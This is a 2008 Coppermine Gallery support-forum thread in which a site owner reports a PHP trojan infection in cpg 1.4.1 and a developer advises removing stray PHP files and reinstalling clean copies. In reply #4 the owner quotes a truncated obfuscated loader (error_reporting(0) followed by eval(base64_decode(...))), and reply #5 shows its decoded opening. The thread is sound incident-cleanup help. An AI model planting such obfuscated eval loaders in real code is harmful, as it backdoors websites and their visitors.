Advanced search  

News:

CPG Release 1.6.26
Correct PHP8.2 issues with user and language managers.
Additional fixes for PHP 8.2
Correct PHP8 error with SMF 2.0 bridge.
Correct IPTC supplimental category parsing.
Download and info HERE

Pages: [1]   Go Down

Author Topic: PHP/Rst.R trojan - cpg v. 1.4.1  (Read 5978 times)

0 Members and 1 Guest are viewing this topic.

TheGM

  • Coppermine newbie
  • Offline Offline
  • Posts: 6
PHP/Rst.R trojan - cpg v. 1.4.1
« on: September 05, 2008, 06:28:33 pm »

Hi All,

I recently discovered that my website was hacked and a number of php files in gallery script corrupted by what the antivirus calls a variant of the PHP/Rst.R trojan virus.

A friend looked at the infected files and they appear to have totally destroyed.

As I recently took over from the webmaster that created the site I don't have the original files that came with that particular version of the software that I could use to replace the infected ones.

Would anyone here know how to fix this problem? As you can guess I have very little knowledge on the subject.

I looked at upgrading the gallery software but I cannot see replacement files in the newer version...

Any help and advice would be greatly appreciated.

Thanks in advance and all the best,
Cristina
Logged

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47843
  • aka "GauGau"
    • gaugau.de
Re: PHP/Rst.R trojan - cpg v. 1.4.1
« Reply #1 on: September 05, 2008, 07:39:09 pm »

http://forum.coppermine-gallery.net/index.php/topic,51927.0.html

The core files can be downloaded - see download link at the top of this screen.
Logged

TheGM

  • Coppermine newbie
  • Offline Offline
  • Posts: 6
Re: PHP/Rst.R trojan - cpg v. 1.4.1
« Reply #2 on: September 10, 2008, 05:07:32 pm »

You are a superstar, thank you ever so much.   :-*

Following your instructions right now, please don't close this thread just yet...  just in case   :)


Thank you again,
Cristina
Logged

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47843
  • aka "GauGau"
    • gaugau.de
Re: PHP/Rst.R trojan - cpg v. 1.4.1
« Reply #3 on: September 11, 2008, 07:40:23 am »

Marking the thread as "solved" (that's what you could have done by yourself using the tick icon in your initial posting), but you can still reply here.
Logged

TheGM

  • Coppermine newbie
  • Offline Offline
  • Posts: 6
Re: PHP/Rst.R trojan - cpg v. 1.4.1
« Reply #4 on: September 11, 2008, 05:32:16 pm »

ha!  I am going through your guide for solving this problem and after comparing the two sets of scripts with WinMerge have come across some odd looking files. I was wondering if you could clarify something for me.

most of the PHP files when opened have some coding with seems like syntax and rules, etc. but some others have only got garbled content (for example: "<?php error_reporting(0);$p="baaebzzazbzjzgfzb";eval(base64_decode("Y2xhc3MgbmV3aHR0cHsNCnByb3RlY3RlZCAkZnVsbHVybDsgcHJvdGVjdGVkICRwX3VybDsgcHJvdGVjdGVkICRjb25uX2lkOyBwcm90ZWN0ZWQgJGZsdXNoZWQ7IHByb3RlY3RlZCAkbW9kZSA9IDQ7IHByb3RlY3RlZCAkZGVmbW9kZTsgcHJvdGVjdGVkICRyZWRpcmVjdHMgPSAwOyBwcm90ZWN0ZWQgJGJpbmFyeTsgcHJvdGVjdGVkICRvcHRpb25zOyBwcm90ZWN0ZWQgJHN0YXQgPSBhcnJheSgnZGV2JyA9P") - others have what looks like a code that points to the 'base64 decode' mentioned in the garbled message. Do I assume that these files have been hacked?

I don't even know if these files are supposed to be in the directories that I found them in and they certainly were not replaced by the upgrade. PLUS there are a couple of files in the albums directory that I know for a fact have been hacked but can't find replacements for them nor I can open them (AV won't let me even when I switch it off).

Here are two files that have been tagged as malicious, would you be able to tell me if they should even exist?

/albums/Members-goodies-sale/docs/configs_dist.php   
/albums/faq.php                                                     

Thank you ever so much,
Cristina (with smoke coming out of my ears)
Logged

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47843
  • aka "GauGau"
    • gaugau.de
Re: PHP/Rst.R trojan - cpg v. 1.4.1
« Reply #5 on: September 11, 2008, 06:45:32 pm »

Do as I suggested in the sanitization thread: get rid of all PHP files that don't belong on the server. Re-upload clean coppermine files (most recent stable release) and you'll be fine. Yes, the code you just posted doesn't exist in a vanilla copy of a coppermine file, so it's likely that it's a hack. The stuff that get's executed is
Code: [Select]
class newhttp{ protected $fullurl; protected $p_url; protected $conn_id; protected $flushed; protected $mode = 4; protected $defmode; protected $redirects = 0; protected $binary; protected $options; protected $stat = array('dev' =, so yes: that's attacking code.

Did I mention that being hacked if you're running cpg1.4.1 (i.e. 18 versions behind the most recent stable release) comes naturally. It's like asking for punishment.

From the sanitization thread:
No support
I'm not ready to support this thread, it comes as-is, as a courtesy for those who find it helpful. Please do not start new threads that refer to this thread with further question. Under no circumstances are you allowed to contact me individually (by PM or email).
This means: no more questions on this subject.
Logged

TheGM

  • Coppermine newbie
  • Offline Offline
  • Posts: 6
Re: PHP/Rst.R trojan - cpg v. 1.4.1
« Reply #6 on: September 11, 2008, 08:19:05 pm »

understood. thanks again.

Cristina
Logged
Pages: [1]   Go Up
 

Page created in 0.019 seconds with 20 queries.